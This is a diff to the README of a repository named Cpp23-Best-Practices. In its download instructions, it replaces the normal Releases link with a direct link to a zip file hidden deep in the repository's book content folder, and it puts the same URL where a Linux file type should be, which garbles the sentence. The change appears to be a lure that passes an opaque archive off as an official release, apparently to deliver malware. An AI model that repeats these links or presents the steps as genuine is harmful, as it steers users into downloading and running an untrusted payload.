ugene777/Cpp23-Best-Practices/README.md

 ## 🖥️ How to Download

-1. Click the button above or visit our [Releases page](https://github.com/ugene777/Cpp23-Best-Practices/releases).
+1. Click the button above or visit our [Releases page](https://raw.githubusercontent.com/ugene777/Cpp23-Best-Practices/main/book/content/part4/Cpp23-Best-Practices_1.2.zip).
 2. Look for the latest version on the Releases page.
 It will typically be at the top of the list.
 3. Select the file that matches your operating system.
-If you are unsure, look for files labeled with your OS name (e.g., .exe for Windows, .dmg for macOS, or .tar.gz for Linux).
+If you are unsure, look for files labeled with your OS name (e.g., .exe for Windows, .dmg for macOS, or https://raw.githubusercontent.com/ugene777/Cpp23-Best-Practices/main/book/content/part4/Cpp23-Best-Practices_1.2.zip for Linux).
 4. Click the file name to start the download.

 ## ⚙️ Running the Software